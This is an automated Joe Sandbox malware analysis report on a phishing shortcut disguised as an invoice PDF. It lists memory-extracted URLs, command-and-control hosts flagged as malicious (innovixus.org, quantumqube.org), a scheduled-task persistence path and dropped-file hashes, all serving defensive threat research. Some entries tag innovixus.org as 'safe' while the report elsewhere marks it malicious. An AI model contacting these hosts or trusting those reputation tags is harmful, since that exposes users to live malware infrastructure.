                                                              http://nsis.sf.net/NSIS_ErrorErrorpowershell.exe, 00000000.00000002.19439337067.0000024CB90F6000.00000004.00000800.00020000.00000000.sdmp, winpdf.exe, 00000003.00000000.19321751854.0000000000408000.00000002.00000001.01000000.00000007.sdmp, winpdf.exe, 00000003.00000002.19379688284.0000000000408000.00000002.00000001.01000000.00000007.sdmp, winpdf.exe.0.drfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://www.ecosia.org/newtab/explorer.exe, 00000012.00000003.20228308712.000000000365F000.00000004.00000020.00020000.00000000.sdmp, F42C.tmp.18.drfalse
                                                                high
                                                                https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.19477320488.0000024CC133D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19418224376.0000024CA92A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://api.msn.com/v1/news/Feed/Windows?activityId=3B289069BAFD4CBAB2367863A646CEB0&timeOut=5000&ocexplorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://innovixus.org/index.php66explorer.exe, 00000019.00000003.20685140752.0000000004DF9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000003.21617248969.0000000004DF9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000002.24418047881.0000000004DF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://android.notify.windows.com/iOSexplorer.exe, 00000010.00000003.20181413547.0000000008F0E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.20000280078.0000000008F0E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://www.msn.com/en-us/weather/forecast/in-New-York?loc=eyJsIjoiTmV3IFlvcmsiLCJyIjoiTmV3IFlvcmsiLexplorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://wns.windows.com/_;explorer.exe, 00000010.00000000.20000280078.0000000008E50000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://pesterbdd.com/images/Pester.pngXz$powershell.exe, 00000000.00000002.19418224376.0000024CA92A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Condition/AAehR3S.pngexplorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://www.msn.com/en-us/lifestyle/lifestyle-buzz/the-greatest-gowns-that-queen-elizabeth-meghan-maexplorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Condition/explorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://www.quovadis.bm0powershell.exe, 00000000.00000002.19477320488.0000024CC1326000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://innovixus.org/explorer.exe, 00000012.00000002.20536514758.00000000035F8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.20536514758.0000000003665000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.20536514758.0000000003675000.00000004.00000020.00020000.00000000.sdmptrue
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://outlook.com_explorer.exe, 00000010.00000000.20005267451.000000000D11E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20175747227.000000000D11E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://gemini.google.com/app?q=F42C.tmp.18.drfalse
                                                                                high
                                                                                https://www.rd.com/list/strange-things-banned-from-plane/explorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://www.msn.com/en-us/autos/other/the-5-most-stolen-cars-in-america-and-the-5-least-stolen-cars-explorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://schemas.microHexplorer.exe, 00000010.00000000.20005267451.000000000D11E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20175747227.000000000D11E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb-darkexplorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://assets.msn.com/weathermapdata/1/static/background/v2.0/jpg/explorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://www.msn.com/en-us/news/uknews/trump-s-loss-making-scotland-golf-course-celebrates-historic-vexplorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaTexplorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA12QGB8-darkexplorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://www.msn.com/en-us/feedexplorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://contoso.com/Licensepowershell.exe, 00000000.00000002.19439337067.0000024CB90F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://www.msn.com/en-us/news/politics/andy-kim-ushers-in-a-new-era-as-he-becomes-1st-asian-americaexplorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppEMexplorer.exe, 00000010.00000000.19995602950.00000000004E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://www.msn.com/en-us/entertainment/news/drumming-legends-25-masters-who-reinvented-the-rhythm/sexplorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://schemas.microexplorer.exe, 00000010.00000000.19996823033.0000000002AC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000010.00000000.20003237784.000000000A510000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000010.00000000.20002205711.0000000009620000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://android.notify.windows.com/iOSdsexplorer.exe, 00000010.00000003.20181413547.0000000008F0E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.20000280078.0000000008F0E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://aka.ms/odirmexplorer.exe, 00000010.00000003.20180551346.0000000009073000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.20000801712.000000000905C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://www.google.com/images/branding/product/ico/googleg_alldp.icoexplorer.exe, 00000012.00000003.20228308712.000000000365F000.00000004.00000020.00020000.00000000.sdmp, F42C.tmp.18.drfalse
                                                                                                      high
                                                                                                      http://innovixus.org/application/x-www-form-urlencodedMozilla/5.0explorer.exe, 00000012.00000002.20536514758.0000000003675000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      http://www.apache.org/licenses/LICENSE-2.0.htmlXz$powershell.exe, 00000000.00000002.19418224376.0000024CA92A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhbexplorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://contoso.com/powershell.exe, 00000000.00000002.19439337067.0000024CB90F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://www.msn.com/en-us/money/markets/stocks-and-bitcoin-jump-after-trump-s-victory-so-do-worries-explorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://innovixus.org/index.phptexplorer.exe, 00000012.00000002.20536514758.00000000035F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://www.msn.com/en-us/travel/tips/10-things-you-can-take-from-planes-and-6-things-you-can-t/ss-Aexplorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://ocsp.quovadisoffshore.com0powershell.exe, 00000000.00000002.19477320488.0000024CC1326000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-darkexplorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              http://crl.mDexplorer.exe, 00000010.00000000.20005267451.000000000CEC4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fgwmexplorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://www.msn.com/en-us/news/politics/chris-matthews-laments-democrats-open-border-policies-after-explorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.19439337067.0000024CB90F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gD5mexplorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  http://innovixus.org/ndex.phpexplorer.exe, 00000012.00000002.20536514758.00000000035F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  http://innovixus.org:80/index.php11explorer.exe, 00000012.00000002.20536514758.00000000035F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icoexplorer.exe, 00000012.00000003.20230614437.0000000003670000.00000004.00000020.00020000.00000000.sdmp, F519.tmp.18.drfalse
                                                                                                                    high
                                                                                                                    https://windows.msn.com:443/shellv2?osLocale=en-us&chosenMarketReason=implicitNewexplorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://excel.office.com/explorer.exe, 00000010.00000000.20005267451.000000000D11E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20175747227.000000000D11E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://windows.msn.com:443/shell?osLocale=en-us&chosenMarketReason=implicitNewexplorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fgwm-darkexplorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          http://www.foreca.comexplorer.exe, 00000010.00000000.20005267451.000000000CF1D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20178509217.000000000CF1D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF3D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://ac.ecosia.org/autocomplete?q=F42C.tmp.18.drfalse
                                                                                                                            high
                                                                                                                            https://www.msn.com/en-us/foodanddrink/recipes/i-asked-3-butchers-how-to-choose-the-best-steak-they-explorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://innovixus.org/Qexplorer.exe, 00000012.00000002.20536514758.00000000035F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              https://powerpoint.office.comEM_explorer.exe, 00000010.00000000.20005267451.000000000CF1D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20178509217.000000000CF1D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              https://stacker.com/storiesexplorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://api.msn.com/explorer.exe, 00000010.00000000.20000801712.0000000009138000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20180551346.0000000009138000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gD5m-darkexplorer.exe, 00000010.00000000.20005267451.000000000CF8B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.20179865414.000000000CF8B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  https://aka.ms/pscore68powershell.exe, 00000000.00000002.19418224376.0000024CA9081000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=F42C.tmp.18.drfalse
                                                                                                                                      high
                                                                                                                                      • No. of IPs < 25%
                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                      • 75% < No. of IPs
                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                      85.192.60.190
                                                                                                                                      quantumqube.orgRussian Federation
                                                                                                                                      47711LINEGROUP-ASRUtrue
                                                                                                                                      150.241.91.218
                                                                                                                                      innovixus.orgSpain
                                                                                                                                      207714TECNALIAEStrue
                                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                                      Analysis ID:1550361
                                                                                                                                      Start date and time:2024-11-06 17:30:27 +01:00
                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                      Overall analysis duration:0h 19m 31s
                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                      Report type:full
                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                      Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                                                                      Run name:Suspected Instruction Hammering
                                                                                                                                      Number of analysed new started processes analysed:26
                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                      Number of injected processes analysed:1
                                                                                                                                      Technologies:
                                                                                                                                      • HCA enabled
                                                                                                                                      • EGA enabled
                                                                                                                                      • AMSI enabled
                                                                                                                                      Analysis Mode:default
                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                      Sample name:invoice_template.pdf.lnk
                                                                                                                                      Detection:MAL
                                                                                                                                      Classification:mal100.bank.troj.spyw.evad.winLNK@41/52@3/2
                                                                                                                                      EGA Information:
                                                                                                                                      • Successful, ratio: 80%
                                                                                                                                      HCA Information:
                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                      • Number of executed functions: 96
                                                                                                                                      • Number of non-executed functions: 301
                                                                                                                                      Cookbook Comments:
                                                                                                                                      • Found application associated with file extension: .lnk
                                                                                                                                      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                                                                      • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, TextInputHost.exe
                                                                                                                                      • Execution Graph export aborted for target powershell.exe, PID 4428 because it is empty
                                                                                                                                      • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                      • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                      • VT rate limit hit for: invoice_template.pdf.lnk
                                                                                                                                      TimeTypeDescription
                                                                                                                                      11:33:16API Interceptor28x Sleep call for process: Productive.pif modified
                                                                                                                                      11:34:17API Interceptor8485268x Sleep call for process: explorer.exe modified
                                                                                                                                      17:34:01Task SchedulerRun new task: Firefox Default Browser Agent C44F6E05EA711A8C path: C:\Users\user\AppData\Roaming\fejhsit
                                                                                                                                      No context
                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                      innovixus.org172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                      • 198.54.117.242
                                                                                                                                      quantumqube.org172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                      • 194.87.189.87
                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                      TECNALIAESfile.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Quasar, StealcBrowse
                                                                                                                                      • 150.241.90.56
                                                                                                                                      mips.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                      • 150.241.95.250
                                                                                                                                      armv7l.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                      • 150.241.88.132
                                                                                                                                      mipsel.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                      • 150.241.95.250
                                                                                                                                      la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                      • 150.241.44.227
                                                                                                                                      XfStyH0fNY.elfGet hashmaliciousMiraiBrowse
                                                                                                                                      • 150.241.92.110
                                                                                                                                      3P4acRdms1.elfGet hashmaliciousMiraiBrowse
                                                                                                                                      • 150.241.44.234
                                                                                                                                      sv35nTY4Fv.elfGet hashmaliciousMiraiBrowse
                                                                                                                                      • 150.241.44.221
                                                                                                                                      mpsl-20231005-1029.elfGet hashmaliciousMiraiBrowse
                                                                                                                                      • 150.241.44.234
                                                                                                                                      sora.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                      • 150.241.92.106
                                                                                                                                      LINEGROUP-ASRUa9rLzLY498.exeGet hashmaliciousDCRatBrowse
                                                                                                                                      • 85.192.63.134
                                                                                                                                      MtgwNNkkgT.exeGet hashmaliciousDCRatBrowse
                                                                                                                                      • 85.192.63.134
                                                                                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      • 85.192.63.194
                                                                                                                                      xGSkelSjdu.exeGet hashmaliciousRaccoon Stealer v2Browse
                                                                                                                                      • 85.192.63.15
                                                                                                                                      ImBetter.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      • 85.192.63.32
                                                                                                                                      B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dllGet hashmaliciousRaccoon Stealer v2Browse
                                                                                                                                      • 85.192.63.204
                                                                                                                                      B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dllGet hashmaliciousRaccoon Stealer v2Browse
                                                                                                                                      • 85.192.63.204
                                                                                                                                      DxIQxeHMa9.exeGet hashmaliciousAmadey, Laplas ClipperBrowse
                                                                                                                                      • 85.192.63.121
                                                                                                                                      Tn4ashLbYc.exeGet hashmaliciousAuroraBrowse
                                                                                                                                      • 85.192.63.77
                                                                                                                                      BkazCbNYxo.exeGet hashmaliciousAurora, AgentTesla, Amadey, Eternity StealerBrowse
                                                                                                                                      • 85.192.63.77
                                                                                                                                      No context
                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                      C:\Users\user\AppData\Local\Temp\367647\Productive.pifKfoiTvEwmD.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                        file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                          Digital Agreement Terms and Payments Comprehensive Evaluation.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                                            Digital Agreement Terms and Payments Comprehensive Evaluation.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                hLV0IGejtp.exeGet hashmaliciousLummaC, Amadey, Stealc, VidarBrowse
                                                                                                                                                  L#U043e#U0430der.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                      PerceivedFurthermore.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                        C:\Users\user\AppData\Local\Temp\744\C\Windows\SysWOW64\WalletBackgroundServiceProxy.dll172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                          SecuriteInfo.com.Trojan.GenericKD.70788680.21050.25766.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                            SecuriteInfo.com.BScope.TrojanPSW.RedLine.20889.11478.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):64
                                                                                                                                                              Entropy (8bit):0.34726597513537405
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:Nlll:Nll
                                                                                                                                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:@...e...........................................................
                                                                                                                                                              Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:modified
                                                                                                                                                              Size (bytes):893608
                                                                                                                                                              Entropy (8bit):6.62028134425878
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                                                                                                                              MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                                                                                                                              SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                                                                                                                              SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                                                                                                                              SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                                                                                                                              Malicious:true
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                              • Filename: KfoiTvEwmD.exe, Detection: malicious, Browse
                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                              • Filename: Digital Agreement Terms and Payments Comprehensive Evaluation.exe, Detection: malicious, Browse
                                                                                                                                                              • Filename: Digital Agreement Terms and Payments Comprehensive Evaluation.exe, Detection: malicious, Browse
                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                              • Filename: hLV0IGejtp.exe, Detection: malicious, Browse
                                                                                                                                                              • Filename: L#U043e#U0430der.exe, Detection: malicious, Browse
                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
